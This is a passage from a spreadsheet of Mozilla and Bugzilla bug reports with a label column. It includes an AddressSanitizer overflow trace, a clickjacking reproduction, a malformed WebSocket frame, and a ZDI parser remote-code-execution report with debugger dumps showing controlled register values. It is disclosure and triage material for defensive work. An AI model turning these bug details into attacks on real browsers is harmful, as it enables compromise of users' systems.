    #8 0x7f23556aa9de in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) /home/attekett/src/layout/base/FrameLayerBuilder.cpp:2250
    #9 0x7f235747013b in mozilla::layers::BasicThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:570
    #10 0x7f23574696db in mozilla::layers::BasicShadowableThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:2395
    #11 0x7f23574627b5 in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:770
    #12 0x7f23574671fa in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:1951
    #13 0x7f2357467356 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:1967
    #14 0x7f2357467356 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:1967
    #15 0x7f2357465af1 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:1658
    #16 0x7f235746db49 in mozilla::layers::BasicShadowLayerManager::EndTransaction(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/attekett/src/gfx/layers/basic/BasicLayers.cpp:3398
    #17 0x7f23557607f7 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) /home/attekett/src/layout/base/nsLayoutUtils.cpp:1852
    #18 0x7f235579ccfd in PresShell::Paint(nsIView*, nsIWidget*, nsRegion const&amp;, nsIntRegion const&amp;, bool) /home/attekett/src/layout/base/nsPresShell.cpp:5409
    #19 0x7f23560513e4 in nsViewManager::Refresh(nsView*, nsIWidget*, nsIntRegion const&amp;, bool) /home/attekett/src/view/src/nsViewManager.cpp:376
    #20 0x7f23560531e4 in nsViewManager::DispatchEvent(nsGUIEvent*, nsIView*, nsEventStatus*) /home/attekett/src/view/src/nsViewManager.cpp:813
    #21 0x7f235604dd61 in HandleEvent /home/attekett/src/view/src/nsView.cpp:159
    #22 0x7f2356d813fb in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) /home/attekett/src/widget/gtk2/nsWindow.cpp:524
    #23 0x7f2356d95a92 in expose_event_cb /home/attekett/src/widget/gtk2/nsWindow.cpp:5393
    #24 0x7f2351dae578 in _gtk_marshal_BOOLEAN__BOXED /build/buildd/gtk+2.0-2.24.4/gtk/gtkmarshalers.c:90
0x7f23312cdda8 is located 0 bytes to the right of 40-byte region [0x7f23312cdd80,0x7f23312cdda8)
allocated by thread T0 here:
    #0 0x40cf8c in posix_memalign ??:0
    #1 0x7f23573f0dec in TryAllocAlignedBytes /home/attekett/src/gfx/thebes/gfxImageSurface.cpp:117
    #2 0x7f23573f0a8a in gfxImageSurface::gfxImageSurface(nsIntSize const&amp;, gfxASurface::gfxImageFormat) /home/attekett/src/gfx/thebes/gfxImageSurface.cpp:139
==5860== ABORTING
Stats: 56M malloced (83M for red zones) by 243696 calls
Stats: 3M realloced by 15734 calls
Stats: 33M freed by 132010 calls
Stats: 0M really freed by 0 calls
Stats: 176M (45077 full pages) mmaped in 44 calls
  mmaps   by size class: 8:229362; 9:24573; 10:8190; 11:8188; 12:2048; 13:1024; 14:768; 15:256; 16:256; 17:64; 18:64; 19:8; 20:4;
  mallocs by size class: 8:207343; 9:20575; 10:6910; 11:5610; 12:1534; 13:763; 14:511; 15:145; 16:203; 17:34; 18:60; 19:5; 20:3;
  frees   by size class: 8:110634; 9:11973; 10:4318; 11:2910; 12:920; 13:593; 14:367; 15:112; 16:138; 17:29; 18:11; 19:3; 20:2;
  rfrees  by size class:
Stats: malloc large: 102 small slow: 971
Shadow byte and word:
  0x1fe466259bb5: fb
  0x1fe466259bb0: 00 00 00 00 00 fb fb fb
More shadow bytes:
  0x1fe466259b90: 00 00 00 00 00 00 00 00
  0x1fe466259b98: 00 fb fb fb fb fb fb fb
  0x1fe466259ba0: fa fa fa fa fa fa fa fa
  0x1fe466259ba8: fa fa fa fa fa fa fa fa
=&gt;0x1fe466259bb0: 00 00 00 00 00 fb fb fb
  0x1fe466259bb8: fb fb fb fb fb fb fb fb
  0x1fe466259bc0: fa fa fa fa fa fa fa fa
  0x1fe466259bc8: fa fa fa fa fa fa fa fa
  0x1fe466259bd0: 00 fb fb fb fb fb fb fb</t>
        </is>
      </c>
      <c r="X2200" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2201">
      <c r="A2201" t="n">
        <v>1833814</v>
      </c>
      <c r="B2201" t="inlineStr">
        <is>
          <t>2023-05-17 23:46:54 -0700</t>
        </is>
      </c>
      <c r="C2201" t="inlineStr">
        <is>
          <t>Custom Cursor mouse overlap permission request prompt (clickjacking on wrong button)</t>
        </is>
      </c>
      <c r="D2201" t="inlineStr">
        <is>
          <t>2024-09-16 00:17:06 -0700</t>
        </is>
      </c>
      <c r="E2201" t="n">
        <v>1</v>
      </c>
      <c r="F2201" t="n">
        <v>1</v>
      </c>
      <c r="G2201" t="n">
        <v>3</v>
      </c>
      <c r="H2201" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2201" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2201" t="inlineStr">
        <is>
          <t>PopupNotifications and Notification Bars</t>
        </is>
      </c>
      <c r="K2201" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2201" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M2201" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2201" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2201" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q2201" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2201" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2201" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T2201" t="n">
        <v>1</v>
      </c>
      <c r="U2201" t="n">
        <v>0</v>
      </c>
      <c r="V2201" t="n">
        <v>48</v>
      </c>
      <c r="W2201" t="inlineStr">
        <is>
          <t>Created attachment 9334775
bandicam 2023-05-18 13-42-20-811.mp4
I found a vulnerability in firefox 112.0.1 (64-bit) (i tested on windows OS) where Mouse cursor pointer (128x128) can overlap the permissions request prompt  which can confuse lead to spoofs.
step to reproduces:
1. open cursorpointer.html
2. click on webpage near the permission request prompt appears</t>
        </is>
      </c>
      <c r="X2201" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2202">
      <c r="A2202" t="n">
        <v>443519</v>
      </c>
      <c r="B2202" t="inlineStr">
        <is>
          <t>2008-07-03 17:34:17 -0700</t>
        </is>
      </c>
      <c r="C2202" t="inlineStr">
        <is>
          <t>Changing Products with Strict Isolation fails when the CC list changes at the same time</t>
        </is>
      </c>
      <c r="D2202" t="inlineStr">
        <is>
          <t>2008-07-06 17:19:46 -0700</t>
        </is>
      </c>
      <c r="E2202" t="n">
        <v>1</v>
      </c>
      <c r="F2202" t="n">
        <v>1</v>
      </c>
      <c r="G2202" t="n">
        <v>4</v>
      </c>
      <c r="H2202" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2202" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2202" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2202" t="inlineStr">
        <is>
          <t>3.1.4</t>
        </is>
      </c>
      <c r="L2202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2202" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2202" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2202" t="inlineStr"/>
      <c r="Q2202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2202" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2202" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2202" t="n">
        <v>1</v>
      </c>
      <c r="U2202" t="n">
        <v>0</v>
      </c>
      <c r="V2202" t="n">
        <v>6</v>
      </c>
      <c r="W2202" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
Build Identifier: Bugzilla 3.1.4
If you change a bugs product, and strict isolation is on you get an error about not being able to access the CClists as objects.
2 different ways to fix it... attached is one option.
Reproducible: Always
Steps to Reproduce:
Steps:
1) Create a bug in product X
2) modify it to be in product Y. Add some one to the CC list.
3) Save. See failure.
Actual Results:  
[Thu Jul 03 16:59:46 2008] [error] [client 127.0.0.1] Can't call method "id" without a package or object reference at Bugzilla/Bug.pm line 1453., referer: http://localhost/bugzilla/process_bug.cgi
[Thu Jul 03 17:00:42 2008] [error] [client 127.0.0.1] Can't locate object method "id" via package "TestProduct" (perhaps you forgot to load "TestProduct"?) at Bugzilla/Bug.pm line 1458., referer: http://localhost/bugzilla/process_bug.cgi
Expected Results:  
record save sucessfully</t>
        </is>
      </c>
      <c r="X2202" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2203">
      <c r="A2203" t="n">
        <v>952429</v>
      </c>
      <c r="B2203" t="inlineStr">
        <is>
          <t>2013-12-20 01:52:19 -0800</t>
        </is>
      </c>
      <c r="C2203" t="inlineStr">
        <is>
          <t>Port holiday calendar index page to bedrock</t>
        </is>
      </c>
      <c r="D2203" t="inlineStr">
        <is>
          <t>2014-03-23 08:10:45 -0700</t>
        </is>
      </c>
      <c r="E2203" t="n">
        <v>1</v>
      </c>
      <c r="F2203" t="n">
        <v>1</v>
      </c>
      <c r="G2203" t="n">
        <v>2</v>
      </c>
      <c r="H2203" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2203" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J2203" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K2203" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2203" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2203" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2203" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2203" t="inlineStr">
        <is>
          <t>u=dev c=bedrock p=3</t>
        </is>
      </c>
      <c r="Q2203" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2203" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2203" t="n">
        <v>1</v>
      </c>
      <c r="U2203" t="n">
        <v>0</v>
      </c>
      <c r="V2203" t="n">
        <v>10</v>
      </c>
      <c r="W2203" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #723267 +++
Porting the holiday calendar index page to bedrock.</t>
        </is>
      </c>
      <c r="X2203" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2204">
      <c r="A2204" t="n">
        <v>1840777</v>
      </c>
      <c r="B2204" t="inlineStr">
        <is>
          <t>2023-06-27 23:20:02 -0700</t>
        </is>
      </c>
      <c r="C2204" t="inlineStr">
        <is>
          <t>.appref-ms file extension = Executable file may contain viruses or other malicious code</t>
        </is>
      </c>
      <c r="D2204" t="inlineStr">
        <is>
          <t>2024-05-30 11:11:37 -0700</t>
        </is>
      </c>
      <c r="E2204" t="n">
        <v>1</v>
      </c>
      <c r="F2204" t="n">
        <v>1</v>
      </c>
      <c r="G2204" t="n">
        <v>2</v>
      </c>
      <c r="H2204" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2204" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2204" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K2204" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2204" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2204" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2204" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2204" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main116+] [adv-ESR115.1+] [adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q2204" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2204" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2204" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T2204" t="n">
        <v>1</v>
      </c>
      <c r="U2204" t="n">
        <v>0</v>
      </c>
      <c r="V2204" t="n">
        <v>33</v>
      </c>
      <c r="W2204" t="inlineStr">
        <is>
          <t>Firefox Version: [115.0] + [116.0a1]
Operating System: [Windows 10]
.appref-ms = ClickOnce application reference. Basically a .lnk for ClickOnce apps.
An appref-ms file can be created that will act similar to an LNK or shortcut file that will contain the URL of the deployment manifest and some other pieces of information.
Chrome Browser &amp; Microsoft Edge :
file_types {
  # ClickOnce application reference. Basically a .lnk for ClickOnce apps.
  extension: "appref-ms"
  uma_value: 144
  ping_setting: FULL_PING
  platform_settings {
    platform: PLATFORM_TYPE_WINDOWS
    danger_level: ALLOW_ON_USER_GESTURE
    auto_open_hint: DISALLOW_AUTO_OPEN
  }
}
This File is Already Blocklisted in Chrome &amp; Edge Browsers
it's better to Add Popop Warning [ Executable files may contain viruses or other malicious code that could harm your computer]
To .appref-ms file To Keep Safe System from malicious file/code</t>
        </is>
      </c>
      <c r="X2204" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2205">
      <c r="A2205" t="n">
        <v>665518</v>
      </c>
      <c r="B2205" t="inlineStr">
        <is>
          <t>2011-06-20 05:50:38 -0700</t>
        </is>
      </c>
      <c r="C2205" t="inlineStr">
        <is>
          <t>Websocket Data Framing crash [@mozilla::net::nsWebSocketHandler::ApplyMask]</t>
        </is>
      </c>
      <c r="D2205" t="inlineStr">
        <is>
          <t>2012-05-30 07:18:57 -0700</t>
        </is>
      </c>
      <c r="E2205" t="n">
        <v>1</v>
      </c>
      <c r="F2205" t="n">
        <v>1</v>
      </c>
      <c r="G2205" t="n">
        <v>3</v>
      </c>
      <c r="H2205" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2205" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2205" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K2205" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2205" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2205" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2205" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2205" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2205" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2205" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T2205" t="n">
        <v>1</v>
      </c>
      <c r="U2205" t="n">
        <v>0</v>
      </c>
      <c r="V2205" t="n">
        <v>11</v>
      </c>
      <c r="W2205" t="inlineStr">
        <is>
          <t>Created attachment 540441
callstack
Received connection: ('127.0.0.1', 61673)
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: x6X5fx2b1lAIM7QZxYAlCH7GW6c=
Sending: b'\t\xff\xfe\x81\x05Hello'</t>
        </is>
      </c>
      <c r="X2205" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2206">
      <c r="A2206" t="n">
        <v>1246014</v>
      </c>
      <c r="B2206" t="inlineStr">
        <is>
          <t>2016-02-04 16:12:30 -0800</t>
        </is>
      </c>
      <c r="C2206" t="inlineStr">
        <is>
          <t>ZDI-CAN-3545: Mozilla Firefox nsHtml5TreeBuilder Array Indexing Remote Code Execution Vulnerability</t>
        </is>
      </c>
      <c r="D2206" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:33 -0700</t>
        </is>
      </c>
      <c r="E2206" t="n">
        <v>1</v>
      </c>
      <c r="F2206" t="n">
        <v>1</v>
      </c>
      <c r="G2206" t="n">
        <v>3</v>
      </c>
      <c r="H2206" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2206" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2206" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K2206" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L2206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2206" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2206" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+] dom-triaged</t>
        </is>
      </c>
      <c r="Q2206" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2206" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2206" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2206" t="n">
        <v>1</v>
      </c>
      <c r="U2206" t="n">
        <v>0</v>
      </c>
      <c r="V2206" t="n">
        <v>26</v>
      </c>
      <c r="W2206" t="inlineStr">
        <is>
          <t>We received the following security bug report from ZDI:
ZDI-CAN-3545: Mozilla Firefox nsHtml5TreeBuilder Array Indexing Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
HP's Zero Day Initiative has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Tested on Windows 8.1.
```
(f70.4d0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=ffffffff ecx=17e6adfc edx=00000002 esi=108a4860 edi=0a675ec0
eip=5f00c7d5 esp=0049d068 ebp=00000002 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210216
xul!nsHtml5TreeBuilder::endTag+0x3c67e8:
5f00c7d5 83780c03        cmp     dword ptr [eax+0Ch],3 ds:0023:4141414d=????????
0:000&gt; !lmi xul
Loaded Module Info: [xul]
         Module: xul
   Base Address: 5e800000
     Image Name: C:\Program Files\Mozilla Firefox\xul.dll
   Machine Type: 332 (I386)
     Time Stamp: 568c8871 Tue Jan 05 19:22:25 2016
           Size: 255b000
       CheckSum: 24bdf46
Characteristics: 2122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    76, 1ed7e78, 1ed6e78 RSDS - GUID: {0AED2A28-9F61-4C0A-86B0-6C0FD6F2A00F}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\toolkit\library\xul.pdb
                   ??    14, 1ed7ef0, 1ed6ef0 [Data not mapped]
                CLSID     4, 1ed7f04, 1ed6f04 [Data not mapped]
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\xul.dll
    Symbol Type: PDB      - Symbols loaded successfully from image path.
                 z:\export\symbols\xul.pdb\0AED2A289F614C0A86B06C0FD6F2A00F2\xul.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
                 z:\export\symbols\xul.pdb\0AED2A289F614C0A86B06C0FD6F2A00F2\xul.pdb
0:000&gt; lmvm xul
start    end        module name
5e800000 60d5b000   xul        (private pdb symbols)  z:\export\symbols\xul.pdb\0AED2A289F614C0A86B06C0FD6F2A00F2\xul.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\xul.dll
    Image path: C:\Program Files\Mozilla Firefox\xul.dll
    Image name: xul.dll
    Timestamp:        Tue Jan 05 19:22:25 2016 (568C8871)
    CheckSum:         024BDF46
    ImageSize:        0255B000
    File version:     43.0.4.5848
    Product version:  43.0.4.5848
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: xul.dll
    ProductVersion:   43.0.4
    FileVersion:      43.0.4
    FileDescription:  43.0.4
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
```
Tested on the nightly build from 20150120:
```
(cec.750): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=ffffffff ecx=1abb66fc edx=00000002 esi=0fbcfb80 edi=0d067100
eip=5beda4da esp=006dcb58 ebp=006dcb6c iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210216
xul!nsHtml5TreeBuilder::endTag+0x3e9613:
5beda4da 83780c03        cmp     dword ptr [eax+0Ch],3 ds:0023:4141414d=????????
0:000&gt; ub @eip
xul!nsHtml5TreeBuilder::endTag+0x3e95f4 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5treebuilder.cpp @ 3033]:
5beda4bb e9906ac1ff      jmp     xul!nsHtml5TreeBuilder::endTag+0x89 (5baf0f50)
5beda4c0 807e1400        cmp     byte ptr [esi+14h],0
5beda4c4 0f85e76dc1ff    jne     xul!nsHtml5TreeBuilder::endTag+0x3ea (5baf12b1)
5beda4ca e9906bc1ff      jmp     xul!nsHtml5TreeBuilder::endTag+0x198 (5baf105f)
5beda4cf 8b5e38          mov     ebx,dword ptr [esi+38h]
5beda4d2 8b4630          mov     eax,dword ptr [esi+30h]
5beda4d5 8d0c98          lea     ecx,[eax+ebx*4]
5beda4d8 8b01            mov     eax,dword ptr [ecx]
0:000&gt; dc @ecx
1abb66fc  41414141 109408e0 17766ac0 17766c60  AAAA.....jv.`lv.
1abb670c  17766c40 e5e5e5e5 e5e5e5e5 e5e5e5e5  @lv.............
1abb671c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb672c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb673c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb674c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb675c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb676c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0:000&gt; dc @ecx-10
1abb66ec  41414141 424241c4 41414141 424241c4  AAAA.ABBAAAA.ABB
1abb66fc  41414141 109408e0 17766ac0 17766c60  AAAA.....jv.`lv.
1abb670c  17766c40 e5e5e5e5 e5e5e5e5 e5e5e5e5  @lv.............
1abb671c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb672c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb673c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb674c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
1abb675c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0:000&gt; kv
ChildEBP RetAddr  Args to Child              
006dcb6c 5baf2c8f 0d08a8d0 00000038 19373530 xul!nsHtml5TreeBuilder::endTag+0x3e9613 (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5treebuilder.cpp @ 2743]
006dcb80 5baf1a89 00000000 00000038 19373530 xul!nsHtml5Tokenizer::emitCurrentTagToken+0xa0 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5tokenizer.cpp @ 296]
006dcbb4 5baf1808 00000000 00000000 00000038 xul!nsHtml5Tokenizer::stateLoop&lt;nsHtml5SilentPolicy&gt;+0x19b (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5tokenizer.cpp @ 2048]
006dcbec 5c29679d 006dcc08 14cee800 006dcd18 xul!nsHtml5Tokenizer::tokenizeBuffer+0x63 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5tokenizer.cpp @ 405]
006dcc14 5c2962bd 006dcd18 14cee800 00000000 xul!nsHtml5StringParser::Tokenize+0x111 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5stringparser.cpp @ 116]
006dcc38 5c3949eb 006dcd18 1766ab00 0d05f960 xul!nsHtml5StringParser::ParseFragment+0x62 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\parser\html\nshtml5stringparser.cpp @ 64]
006dcc68 5be4285a 0d05f960 0000000a 1766ab00 xul!nsContentUtils::ParseFragmentHTML+0x7d (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nscontentutils.cpp @ 4409]
006dcce8 5bcd4763 006dcd18 006dcd08 006dcee8 xul!mozilla::dom::FragmentOrElement::SetInnerHTMLInternal+0x54d54e (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\fragmentorelement.cpp @ 2280]
006dcdb0 5bb7e554 156f76b0 006dcde8 1766ab00 xul!mozilla::dom::ElementBinding::set_innerHTML+0x62 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\dom\bindings\elementbinding.cpp @ 2699]
006dcdfc 5b90719e 156f76b0 00000001 1766ab00 xul!mozilla::dom::GenericBindingSetter+0xd2 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\bindings\bindingutils.cpp @ 2682]
006dce84 5b9058bd 00000000 006dd0a0 156f76b0 xul!js::Invoke+0x13e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 481]
